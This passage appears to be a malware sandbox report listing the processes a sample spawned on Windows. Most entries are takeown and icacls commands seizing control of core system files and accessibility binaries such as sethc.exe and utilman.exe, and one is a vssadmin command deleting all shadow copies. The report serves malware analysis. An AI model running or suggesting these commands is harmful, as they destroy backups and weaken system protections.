  "C:\windows\system32\icacls.exe" "C:\windows\system32\ntoskrnl.exe" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:620
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\zh-CN" /grant Administrators:F
  2⤵
  PID:1088
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\zh-TW" /a
  2⤵
  PID:2092
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\zh-TW" /grant Administrators:F
  2⤵
  PID:1788
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo" /a
  2⤵
  PID:4844
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo" /grant Administrators:F
  2⤵
  PID:4512
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" /a
  2⤵
  PID:3060
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" /grant Administrators:F
  2⤵
  PID:6092
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\hal.dll" /a
  2⤵
  PID:5708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\hal.dll" /grant Administrators:F
  2⤵
  PID:3484
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE" /a
  2⤵
  PID:2752
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE" /grant Administrators:F
  2⤵
  PID:4960
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US" /a
  2⤵
  PID:5452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US" /grant Administrators:F
  2⤵
  PID:5392
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES" /a
  2⤵
  - Modifies file permissions
  PID:4008
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES" /grant Administrators:F
  2⤵
  PID:4508
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR" /a
  2⤵
  PID:4568
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR" /grant Administrators:F
  2⤵
  PID:4528
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\servicing\trustedinstaller.exe" /a
  2⤵
  PID:5128
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT" /a
  2⤵
  PID:2272
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\servicing\trustedinstaller.exe" /grant Administrators:F
  2⤵
  PID:4296
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT" /grant Administrators:F
  2⤵
  PID:4880
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP" /a
  2⤵
  PID:4524
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:4032
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\uk-UA" /a
  2⤵
  - Modifies file permissions
  PID:4288
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\uk-UA" /grant Administrators:F
  2⤵
  PID:1604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OFFICE16" /a
  2⤵
  PID:676
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OFFICE16" /grant Administrators:F
  2⤵
  PID:3712
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE" /a
  2⤵
  PID:5176
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\cmd.exe" /a
  2⤵
  PID:2684
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE" /grant Administrators:F
  2⤵
  PID:3792
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\cmd.exe" /grant Administrators:F
  2⤵
  PID:5096
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller" /a
  2⤵
  PID:4636
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller" /grant Administrators:F
  2⤵
  PID:5040
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform" /a
  2⤵
  PID:5136
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform" /grant Administrators:F
  2⤵
  PID:5732
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Source Engine" /a
  2⤵
  PID:3816
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Source Engine" /grant Administrators:F
  2⤵
  PID:5400
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE" /a
  2⤵
  PID:376
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\regedit.exe" /a
  2⤵
  PID:1900
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3532
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\regedit.exe" /grant Administrators:F
  2⤵
  PID:64
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Stationery" /a
  2⤵
  PID:1740
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Stationery" /grant Administrators:F
  2⤵
  PID:4048
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\TextConv" /a
  2⤵
  PID:5504
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\TextConv" /grant Administrators:F
  2⤵
  PID:1672
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\TextConv\en-US" /a
  2⤵
  PID:2724
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\TextConv\en-US" /grant Administrators:F
  2⤵
  PID:1952
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Triedit" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1216
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Triedit" /grant Administrators:F
  2⤵
  PID:2588
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\reg.exe" /a
  2⤵
  - Possible privilege escalation attempt
  PID:32
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Triedit\en-US" /a
  2⤵
  PID:5708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\reg.exe" /grant Administrators:F
  2⤵
  PID:1972
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Triedit\en-US" /grant Administrators:F
  2⤵
  PID:368
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VC" /a
  2⤵
  PID:640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VC" /grant Administrators:F
  2⤵
  PID:3120
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VGX" /a
  2⤵
  PID:884
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VGX" /grant Administrators:F
  2⤵
  PID:5736
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO" /a
  2⤵
  PID:4008
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO" /grant Administrators:F
  2⤵
  PID:2240
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0" /a
  2⤵
  PID:3856
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\taskmgr.exe" /a
  2⤵
  PID:2376
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO\10.0" /grant Administrators:F
  2⤵
  PID:3472
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\taskmgr.exe" /grant Administrators:F
  2⤵
  PID:3688
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe" /a
  2⤵
  PID:2272
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe" /grant Administrators:F
  2⤵
  PID:2224
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2476
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033" /grant Administrators:F
  2⤵
  PID:4520
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Services" /a
  2⤵
  PID:4572
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Services" /grant Administrators:F
  2⤵
  PID:6028
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\utilman.exe" /a
  2⤵
  - Possible privilege escalation attempt
  PID:6036
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System" /a
  2⤵
  PID:4948
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\utilman.exe" /grant Administrators:F
  2⤵
  PID:3692
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System" /grant Administrators:F
  2⤵
  PID:3320
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado" /a
  2⤵
  PID:5076
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado" /grant Administrators:F
  2⤵
  PID:3188
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\de-DE" /a
  2⤵
  PID:5492
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\de-DE" /grant Administrators:F
  2⤵
  PID:3976
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\en-US" /a
  2⤵
  PID:5040
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\en-US" /grant Administrators:F
  2⤵
  PID:4336
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\es-ES" /a
  2⤵
  PID:1576
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\es-ES" /grant Administrators:F
  2⤵
  PID:1400
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\perfmon.exe" /a
  2⤵
  PID:1668
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\fr-FR" /a
  2⤵
  PID:2680
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\perfmon.exe" /grant Administrators:F
  2⤵
  PID:6124
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\fr-FR" /grant Administrators:F
  2⤵
  PID:5476
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\it-IT" /a
  2⤵
  PID:1588
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\it-IT" /grant Administrators:F
  2⤵
  PID:1424
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\ja-JP" /a
  2⤵
  PID:4844
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\ja-JP" /grant Administrators:F
  2⤵
  PID:508
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\de-DE" /a
  2⤵
  PID:5856
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\de-DE" /grant Administrators:F
  2⤵
  PID:2264
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\en-US" /a
  2⤵
  PID:544
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\perfmon.msc" /a
  2⤵
  PID:2524
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\en-US" /grant Administrators:F
  2⤵
  PID:2960
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\perfmon.msc" /grant Administrators:F
  2⤵
  PID:1228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\es-ES" /a
  2⤵
  PID:3088
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\es-ES" /grant Administrators:F
  2⤵
  PID:3156
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\fr-FR" /a
  2⤵
  PID:2752
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\fr-FR" /grant Administrators:F
  2⤵
  PID:1096
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\it-IT" /a
  2⤵
  PID:1692
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\it-IT" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4600
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ja-JP" /a
  2⤵
  PID:752
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ja-JP" /grant Administrators:F
  2⤵
  PID:4684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\resmon.exe" /a
  2⤵
  PID:4688
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc" /a
  2⤵
  PID:4900
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\resmon.exe" /grant Administrators:F
  2⤵
  PID:4672
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc" /grant Administrators:F
  2⤵
  PID:2284
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\de-DE" /a
  2⤵
  PID:4392
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\de-DE" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4720
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\en-US" /a
  2⤵
  PID:860
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\en-US" /grant Administrators:F
  2⤵
  PID:4200
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\es-ES" /a
  2⤵
  PID:6136
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\es-ES" /grant Administrators:F
  2⤵
  PID:2708
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\fr-FR" /a
  2⤵
  PID:2124
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\sethc.exe" /a
  2⤵
  PID:3092
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\fr-FR" /grant Administrators:F
  2⤵
  PID:5176
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\sethc.exe" /grant Administrators:F
  2⤵
  PID:2240
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\it-IT" /a
  2⤵
  PID:4948
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\it-IT" /grant Administrators:F
  2⤵
  PID:4980
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\ja-JP" /a
  2⤵
  PID:1208
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\ja-JP" /grant Administrators:F
  2⤵
  PID:2972
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB" /a
  2⤵
  PID:2108
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB" /grant Administrators:F
  2⤵
  PID:5636
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\de-DE" /a
  2⤵
  - Modifies file permissions
  PID:1904
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\taskkill.exe" /a
  2⤵
  - Possible privilege escalation attempt
  PID:5828
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\de-DE" /grant Administrators:F
  2⤵
  PID:5400
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\taskkill.exe" /grant Administrators:F
  2⤵
  PID:5388
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\en-US" /a
  2⤵
  PID:1260
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\en-US" /grant Administrators:F
  2⤵
  PID:2016
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\es-ES" /a
  2⤵
  PID:5216
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\es-ES" /grant Administrators:F
  2⤵
  PID:428
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\fr-FR" /a
  2⤵
  PID:4984
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\fr-FR" /grant Administrators:F
  2⤵
  PID:3896
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\it-IT" /a
  2⤵
  PID:208
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\it-IT" /grant Administrators:F
  2⤵
  PID:5080
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\ja-JP" /a
  2⤵
  PID:5336
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\sfc.exe" /a
  2⤵
  PID:5204
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\ja-JP" /grant Administrators:F
  2⤵
  PID:1588
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\sfc.exe" /grant Administrators:F
  2⤵
  PID:5856
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\uk-UA" /a
  2⤵
  PID:5800
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\uk-UA" /grant Administrators:F
  2⤵
  PID:5412
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Crashpad" /a
  2⤵
  PID:6024
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Crashpad" /grant Administrators:F
  2⤵
  PID:4920
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Crashpad\attachments" /a
  2⤵
  - Modifies file permissions
  PID:5544
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Crashpad\attachments" /grant Administrators:F
  2⤵
  PID:5392
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Crashpad\reports" /a
  2⤵
  PID:2516
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Crashpad\reports" /grant Administrators:F
  2⤵
  PID:4488
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\rundll32.exe" /a
  2⤵
  PID:4804
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet" /a
  2⤵
  PID:3252
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\rundll32.exe" /grant Administrators:F
  2⤵
  PID:1524
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet" /grant Administrators:F
  2⤵
  PID:3920
- C:\windows\system32\vssadmin.exe
  "C:\windows\system32\vssadmin.exe" delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1344
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\dotnet.exe" /a
  2⤵
  - Possible privilege escalation attempt
  PID:5028
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\dotnet.exe" /grant Administrators:F
  2⤵
  PID:4704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host" /a
  2⤵
  PID:3688
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host" /grant Administrators:F
  2⤵
  PID:3856
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr" /a
  2⤵
  PID:752
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr" /grant Administrators:F
  2⤵
  PID:3128
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr\6.0.27" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2312
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr\6.0.27" /grant Administrators:F
  2⤵
  PID:4448
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr\7.0.16" /a
  2⤵
  PID:4584
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr\7.0.16" /grant Administrators:F
  2⤵
  PID:1208
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr\8.0.2" /a
  2⤵
  PID:5492
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr\8.0.2" /grant Administrators:F
  2⤵
  PID:3188
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared" /a
  2⤵
  PID:760
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared" /grant Administrators:F
  2⤵
  PID:900
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App" /a
  2⤵
  PID:2164
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2104
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27" /a
  2⤵
  PID:5552
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27" /grant Administrators:F
  2⤵
  PID:1460
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe" /a
  2⤵
  PID:2632
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe" /grant Administrators:F
  2⤵
  PID:1608
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16" /a
  2⤵
  - Possible privilege escalation attempt
  PID:6092
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4052
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe" /a
  2⤵
  PID:2036
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe" /grant Administrators:F
  2⤵
  PID:5624
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2" /a
  2⤵
  PID:1764
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2" /grant Administrators:F
  2⤵
  PID:2016
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe" /a
  2⤵
  PID:1904
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe" /grant Administrators:F
  2⤵
  PID:3592
- C:\windows\system32\takeown.exe
